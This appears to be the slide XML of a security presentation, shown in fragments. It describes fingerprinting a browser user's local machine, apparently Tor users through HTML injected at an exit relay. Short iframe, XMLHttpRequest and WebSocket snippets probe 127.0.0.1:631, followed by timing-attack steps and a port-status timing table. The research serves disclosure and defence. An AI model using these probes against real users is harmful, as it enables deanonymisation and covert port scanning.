                      <a:endParaRPr lang="en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-662142771</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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-182252719</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-C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233062667</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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Fingerprint Surface</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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03141"/>
            <a:ext cx="6912768" cy="534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60032" y="4581128"/>
            <a:ext cx="864096" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21CD35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Fingerprint Surface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2411760" y="3645025"/>
            <a:ext cx="4392488" cy="1008112"/>
            <a:chOff x="2339752" y="5229200"/>
            <a:chExt cx="4680520" cy="1008112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2771800" y="5229200"/>
              <a:ext cx="3744416" cy="100811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/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2339752" y="5229200"/>
              <a:ext cx="1008112" cy="100811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/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6012160" y="5229200"/>
              <a:ext cx="1008112" cy="1008112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47864" y="42930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Tor</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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8" name="Left Arrow 127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907704" y="3717032"/>
            <a:ext cx="5616624" cy="360040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2" name="Picture 121" descr="desktop-computer-12027669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97"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="3429000"/>
            <a:ext cx="1450861" cy="1296144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7524328" y="3717032"/>
            <a:ext cx="1172695" cy="592056"/>
            <a:chOff x="2720359" y="1484784"/>
            <a:chExt cx="1172695" cy="592056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="124" name="Picture 123" descr="server.pn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720359" y="1484784"/>
              <a:ext cx="1172695" cy="592056"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="125" name="Picture 124" descr="id-47557-logo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062103" y="149739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sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="TextBox 125"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7328871" y="33569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Exit Relay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Circular Arrow 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="2852936"/>
            <a:ext cx="936104" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="circular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7864" y="37170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Injected HTML </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Left Arrow 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1907704" y="4077072"/>
            <a:ext cx="5616624" cy="360040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2" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2874827" y="3645024"/>
            <a:ext cx="3466355" cy="1008114"/>
            <a:chOff x="2874827" y="3573015"/>
            <a:chExt cx="3466355" cy="1008114"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Freeform 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2874827" y="3573015"/>
              <a:ext cx="473037" cy="1008113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 946074"/>
                <a:gd name="connsiteY0" fmla="*/ 504056 h 1008112"/>
                <a:gd name="connsiteX1" fmla="*/ 128105 w 946074"/>
                <a:gd name="connsiteY1" fmla="*/ 159123 h 1008112"/>
                <a:gd name="connsiteX2" fmla="*/ 473038 w 946074"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1008112"/>
                <a:gd name="connsiteX3" fmla="*/ 817970 w 946074"/>
                <a:gd name="connsiteY3" fmla="*/ 159124 h 1008112"/>
                <a:gd name="connsiteX4" fmla="*/ 946074 w 946074"/>
                <a:gd name="connsiteY4" fmla="*/ 504057 h 1008112"/>
                <a:gd name="connsiteX5" fmla="*/ 817970 w 946074"/>
                <a:gd name="connsiteY5" fmla="*/ 848990 h 1008112"/>
                <a:gd name="connsiteX6" fmla="*/ 473037 w 946074"/>
                <a:gd name="connsiteY6" fmla="*/ 1008113 h 1008112"/>
                <a:gd name="connsiteX7" fmla="*/ 128104 w 946074"/>
                <a:gd name="connsiteY7" fmla="*/ 848989 h 1008112"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 946074"/>
                <a:gd name="connsiteY8" fmla="*/ 504056 h 1008112"/>
                <a:gd name="connsiteX0" fmla="*/ 2652 w 948726"/>
                <a:gd name="connsiteY0" fmla="*/ 506574 h 1010631"/>
                <a:gd name="connsiteX1" fmla="*/ 146668 w 948726"/>
                <a:gd name="connsiteY1" fmla="*/ 146534 h 1010631"/>
                <a:gd name="connsiteX2" fmla="*/ 475690 w 948726"/>
                <a:gd name="connsiteY2" fmla="*/ 2518 h 1010631"/>
                <a:gd name="connsiteX3" fmla="*/ 820622 w 948726"/>
                <a:gd name="connsiteY3" fmla="*/ 161642 h 1010631"/>
                <a:gd name="connsiteX4" fmla="*/ 948726 w 948726"/>
                <a:gd name="connsiteY4" fmla="*/ 506575 h 1010631"/>
                <a:gd name="connsiteX5" fmla="*/ 820622 w 948726"/>
                <a:gd name="connsiteY5" fmla="*/ 851508 h 1010631"/>
                <a:gd name="connsiteX6" fmla="*/ 475689 w 948726"/>
                <a:gd name="connsiteY6" fmla="*/ 1010631 h 1010631"/>
                <a:gd name="connsiteX7" fmla="*/ 130756 w 948726"/>
                <a:gd name="connsiteY7" fmla="*/ 851507 h 1010631"/>
                <a:gd name="connsiteX8" fmla="*/ 2652 w 948726"/>
                <a:gd name="connsiteY8" fmla="*/ 506574 h 1010631"/>
                <a:gd name="connsiteX0" fmla="*/ 57489 w 1003563"/>
                <a:gd name="connsiteY0" fmla="*/ 504056 h 1008113"/>
                <a:gd name="connsiteX1" fmla="*/ 530527 w 1003563"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1008113"/>
                <a:gd name="connsiteX2" fmla="*/ 875459 w 1003563"/>
                <a:gd name="connsiteY2" fmla="*/ 159124 h 1008113"/>
                <a:gd name="connsiteX3" fmla="*/ 1003563 w 1003563"/>
                <a:gd name="connsiteY3" fmla="*/ 504057 h 1008113"/>
                <a:gd name="connsiteX4" fmla="*/ 875459 w 1003563"/>
                <a:gd name="connsiteY4" fmla="*/ 848990 h 1008113"/>
                <a:gd name="connsiteX5" fmla="*/ 530526 w 1003563"/>
                <a:gd name="connsiteY5" fmla="*/ 1008113 h 1008113"/>
                <a:gd name="connsiteX6" fmla="*/ 185593 w 1003563"/>
                <a:gd name="connsiteY6" fmla="*/ 848989 h 1008113"/>
                <a:gd name="connsiteX7" fmla="*/ 57489 w 1003563"/>
                <a:gd name="connsiteY7" fmla="*/ 504056 h 1008113"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 817970"/>
                <a:gd name="connsiteY0" fmla="*/ 848989 h 1008113"/>
                <a:gd name="connsiteX1" fmla="*/ 344934 w 817970"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1008113"/>
                <a:gd name="connsiteX2" fmla="*/ 689866 w 817970"/>
                <a:gd name="connsiteY2" fmla="*/ 159124 h 1008113"/>
                <a:gd name="connsiteX3" fmla="*/ 817970 w 817970"/>
                <a:gd name="connsiteY3" fmla="*/ 504057 h 1008113"/>
                <a:gd name="connsiteX4" fmla="*/ 689866 w 817970"/>
                <a:gd name="connsiteY4" fmla="*/ 848990 h 1008113"/>
                <a:gd name="connsiteX5" fmla="*/ 344933 w 817970"/>
                <a:gd name="connsiteY5" fmla="*/ 1008113 h 1008113"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 817970"/>
                <a:gd name="connsiteY6" fmla="*/ 848989 h 1008113"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 817970"/>
                <a:gd name="connsiteY0" fmla="*/ 848989 h 1008113"/>
                <a:gd name="connsiteX1" fmla="*/ 344934 w 817970"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1008113"/>
                <a:gd name="connsiteX2" fmla="*/ 689866 w 817970"/>
                <a:gd name="connsiteY2" fmla="*/ 159124 h 1008113"/>
                <a:gd name="connsiteX3" fmla="*/ 817970 w 817970"/>
                <a:gd name="connsiteY3" fmla="*/ 504057 h 1008113"/>
                <a:gd name="connsiteX4" fmla="*/ 689866 w 817970"/>
                <a:gd name="connsiteY4" fmla="*/ 848990 h 1008113"/>
                <a:gd name="connsiteX5" fmla="*/ 344933 w 817970"/>
                <a:gd name="connsiteY5" fmla="*/ 1008113 h 1008113"/>
                <a:gd name="connsiteX6" fmla="*/ 91440 w 817970"/>
                <a:gd name="connsiteY6" fmla="*/ 940429 h 1008113"/>
                <a:gd name="connsiteX0" fmla="*/ 255516 w 728552"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1008113"/>
                <a:gd name="connsiteX1" fmla="*/ 600448 w 728552"/>
                <a:gd name="connsiteY1" fmla="*/ 159124 h 1008113"/>
                <a:gd name="connsiteX2" fmla="*/ 728552 w 728552"/>
                <a:gd name="connsiteY2" fmla="*/ 504057 h 1008113"/>
                <a:gd name="connsiteX3" fmla="*/ 600448 w 728552"/>
                <a:gd name="connsiteY3" fmla="*/ 848990 h 1008113"/>
                <a:gd name="connsiteX4" fmla="*/ 255515 w 728552"/>
                <a:gd name="connsiteY4" fmla="*/ 1008113 h 1008113"/>
                <a:gd name="connsiteX5" fmla="*/ 2022 w 728552"/>
                <a:gd name="connsiteY5" fmla="*/ 940429 h 1008113"/>
                <a:gd name="connsiteX0" fmla="*/ 1 w 473037"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1008113"/>
                <a:gd name="connsiteX1" fmla="*/ 344933 w 473037"/>
                <a:gd name="connsiteY1" fmla="*/ 159124 h 1008113"/>
                <a:gd name="connsiteX2" fmla="*/ 473037 w 473037"/>
                <a:gd name="connsiteY2" fmla="*/ 504057 h 1008113"/>
                <a:gd name="connsiteX3" fmla="*/ 344933 w 473037"/>
                <a:gd name="connsiteY3" fmla="*/ 848990 h 1008113"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 473037"/>
                <a:gd name="connsiteY4" fmla="*/ 1008113 h 10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37" h="1008113">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="112327" y="2518"/>
                    <a:pt x="255516" y="57595"/>
                    <a:pt x="344933" y="159124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427231" y="252569"/>
                    <a:pt x="473037" y="375907"/>
                    <a:pt x="473037" y="504057"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="473037" y="632206"/>
                    <a:pt x="427230" y="755545"/>
                    <a:pt x="344933" y="848990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255515" y="950519"/>
                    <a:pt x="130668" y="1008113"/>
                    <a:pt x="0" y="1008113"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:no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868144" y="3573016"/>
              <a:ext cx="473038" cy="1008113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 946074"/>
                <a:gd name="connsiteY0" fmla="*/ 504056 h 1008112"/>
                <a:gd name="connsiteX1" fmla="*/ 128105 w 946074"/>
                <a:gd name="connsiteY1" fmla="*/ 159123 h 1008112"/>
                <a:gd name="connsiteX2" fmla="*/ 473038 w 946074"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1008112"/>
                <a:gd name="connsiteX3" fmla="*/ 817970 w 946074"/>
                <a:gd name="connsiteY3" fmla="*/ 159124 h 1008112"/>
                <a:gd name="connsiteX4" fmla="*/ 946074 w 946074"/>
                <a:gd name="connsiteY4" fmla="*/ 504057 h 1008112"/>
                <a:gd name="connsiteX5" fmla="*/ 817970 w 946074"/>
                <a:gd name="connsiteY5" fmla="*/ 848990 h 1008112"/>
                <a:gd name="connsiteX6" fmla="*/ 473037 w 946074"/>
                <a:gd name="connsiteY6" fmla="*/ 1008113 h 1008112"/>
                <a:gd name="connsiteX7" fmla="*/ 128104 w 946074"/>
                <a:gd name="connsiteY7" fmla="*/ 848989 h 1008112"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 946074"/>
                <a:gd name="connsiteY8" fmla="*/ 504056 h 1008112"/>
                <a:gd name="connsiteX0" fmla="*/ 817970 w 946074"/>
                <a:gd name="connsiteY0" fmla="*/ 159124 h 1008113"/>
                <a:gd name="connsiteX1" fmla="*/ 946074 w 946074"/>
                <a:gd name="connsiteY1" fmla="*/ 504057 h 1008113"/>
                <a:gd name="connsiteX2" fmla="*/ 817970 w 946074"/>
                <a:gd name="connsiteY2" fmla="*/ 848990 h 1008113"/>
                <a:gd name="connsiteX3" fmla="*/ 473037 w 946074"/>
                <a:gd name="connsiteY3" fmla="*/ 1008113 h 1008113"/>
                <a:gd name="connsiteX4" fmla="*/ 128104 w 946074"/>
                <a:gd name="connsiteY4" fmla="*/ 848989 h 1008113"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 946074"/>
                <a:gd name="connsiteY5" fmla="*/ 504056 h 1008113"/>
                <a:gd name="connsiteX6" fmla="*/ 128105 w 946074"/>
                <a:gd name="connsiteY6" fmla="*/ 159123 h 1008113"/>
                <a:gd name="connsiteX7" fmla="*/ 473038 w 946074"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 1008113"/>
                <a:gd name="connsiteX8" fmla="*/ 909410 w 946074"/>
                <a:gd name="connsiteY8" fmla="*/ 250564 h 1008113"/>
                <a:gd name="connsiteX0" fmla="*/ 817970 w 1003563"/>
                <a:gd name="connsiteY0" fmla="*/ 159124 h 1008113"/>
                <a:gd name="connsiteX1" fmla="*/ 946074 w 1003563"/>
                <a:gd name="connsiteY1" fmla="*/ 504057 h 1008113"/>
                <a:gd name="connsiteX2" fmla="*/ 473037 w 1003563"/>
                <a:gd name="connsiteY2" fmla="*/ 1008113 h 1008113"/>
                <a:gd name="connsiteX3" fmla="*/ 128104 w 1003563"/>
                <a:gd name="connsiteY3" fmla="*/ 848989 h 1008113"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 1003563"/>
                <a:gd name="connsiteY4" fmla="*/ 504056 h 1008113"/>
                <a:gd name="connsiteX5" fmla="*/ 128105 w 1003563"/>
                <a:gd name="connsiteY5" fmla="*/ 159123 h 1008113"/>
                <a:gd name="connsiteX6" fmla="*/ 473038 w 1003563"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 1008113"/>
                <a:gd name="connsiteX7" fmla="*/ 909410 w 1003563"/>
                <a:gd name="connsiteY7" fmla="*/ 250564 h 1008113"/>
                <a:gd name="connsiteX0" fmla="*/ 817970 w 909410"/>
                <a:gd name="connsiteY0" fmla="*/ 159124 h 1008113"/>
                <a:gd name="connsiteX1" fmla="*/ 473037 w 909410"/>
                <a:gd name="connsiteY1" fmla="*/ 1008113 h 1008113"/>
                <a:gd name="connsiteX2" fmla="*/ 128104 w 909410"/>
                <a:gd name="connsiteY2" fmla="*/ 848989 h 1008113"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 909410"/>
                <a:gd name="connsiteY3" fmla="*/ 504056 h 1008113"/>
                <a:gd name="connsiteX4" fmla="*/ 128105 w 909410"/>
                <a:gd name="connsiteY4" fmla="*/ 159123 h 1008113"/>
                <a:gd name="connsiteX5" fmla="*/ 473038 w 909410"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 1008113"/>
                <a:gd name="connsiteX6" fmla="*/ 909410 w 909410"/>
                <a:gd name="connsiteY6" fmla="*/ 250564 h 1008113"/>
                <a:gd name="connsiteX0" fmla="*/ 817970 w 817970"/>
                <a:gd name="connsiteY0" fmla="*/ 159124 h 1008113"/>
                <a:gd name="connsiteX1" fmla="*/ 473037 w 817970"/>
                <a:gd name="connsiteY1" fmla="*/ 1008113 h 1008113"/>
                <a:gd name="connsiteX2" fmla="*/ 128104 w 817970"/>
                <a:gd name="connsiteY2" fmla="*/ 848989 h 1008113"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 817970"/>
                <a:gd name="connsiteY3" fmla="*/ 504056 h 1008113"/>
                <a:gd name="connsiteX4" fmla="*/ 128105 w 817970"/>
                <a:gd name="connsiteY4" fmla="*/ 159123 h 1008113"/>
                <a:gd name="connsiteX5" fmla="*/ 473038 w 817970"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 1008113"/>
                <a:gd name="connsiteX0" fmla="*/ 473037 w 473038"/>
                <a:gd name="connsiteY0" fmla="*/ 1008113 h 1008113"/>
                <a:gd name="connsiteX1" fmla="*/ 128104 w 473038"/>
                <a:gd name="connsiteY1" fmla="*/ 848989 h 1008113"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 473038"/>
                <a:gd name="connsiteY2" fmla="*/ 504056 h 1008113"/>
                <a:gd name="connsiteX3" fmla="*/ 128105 w 473038"/>
                <a:gd name="connsiteY3" fmla="*/ 159123 h 1008113"/>
                <a:gd name="connsiteX4" fmla="*/ 473038 w 473038"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 100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38" h="1008113">
                  <a:moveTo>
                    <a:pt x="473037" y="1008113"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="342369" y="1008113"/>
                    <a:pt x="217522" y="950519"/>
                    <a:pt x="128104" y="848989"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45806" y="755544"/>
                    <a:pt x="0" y="632206"/>
                    <a:pt x="0" y="504056"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="375906"/>
                    <a:pt x="45807" y="252568"/>
                    <a:pt x="128105" y="159123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217523" y="57594"/>
                    <a:pt x="342370" y="0"/>
                    <a:pt x="473038" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:no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3347864" y="40770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Response</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Circular Arrow 130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="783914" y="4025225"/>
            <a:ext cx="936104" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="circular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-36512" y="523094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127.0.0.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Response</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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-36512" y="22768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127.0.0.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Request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7" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="129" grpId="0" animBg="1"/>
      <p:bldP spid="130" grpId="0"/>
      <p:bldP spid="131" grpId="0" animBg="1"/>
      <p:bldP spid="132" grpId="0"/>
      <p:bldP spid="1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Fingerprint Surface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052736"/>
            <a:ext cx="14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/>
              <a:t>iframe</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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508591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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=“127.0.0.1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>631</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>”&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&gt;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Same-origin policy forbids access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> content and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> handler.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onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> handler still triggers, but only on valid http response.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3224009"/>
            <a:ext cx="3152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/>
              <a:t>xmlhttprequest</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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3750131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(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.open(“GET”,“127.0.0.1:631”,true);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Same-origin policy forbids reading response but allows sending.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4736177"/>
            <a:ext cx="222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/>
              <a:t>websocket</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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526229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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(“127.0.0.1:631”);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Requires a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>websocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> server to be running on 127.0.0.1:631.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Fingerprint Surface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052736"/>
            <a:ext cx="2808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Timing Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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155679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Record current time.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Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>websocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> port.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Add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> handler that finds the difference between recorded time and  current time.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Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>websocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean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3429000"/>
            <a:ext cx="156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Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="36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95536" y="4077072"/>
          <a:ext cx="849694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3026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Port Status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Windows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Linux/Unix</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="3026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Closed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>(Type 1)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700ms</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> to 1200ms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0ms to 400ms</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="302611">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
                        <a:t>Restricted </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>(Type -1)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Access Denied Exception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Access Denied Exception</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="3026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baseline="0" dirty="0" smtClean="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Type 2)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20000ms</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> to 20400ms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20000ms</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> to 20400ms</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="30261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Open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>(Type 3)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0ms to 400ms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0ms to 400ms</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="259432">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-CA" sz="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026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HTTP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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iframe.onload</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> triggers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iframe.onload</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> triggers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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Proof of Concept Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="linux_test_edited.mp40001-061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504" y="2132856"/>
            <a:ext cx="4608512" cy="4127026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="winscantest_edited0032-0800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788024" y="2132856"/>
            <a:ext cx="4322041" cy="352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556792"/>
            <a:ext cx="2731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/>
              <a:t>Gentoo</a:t>
            </a:r>
            <a:r>
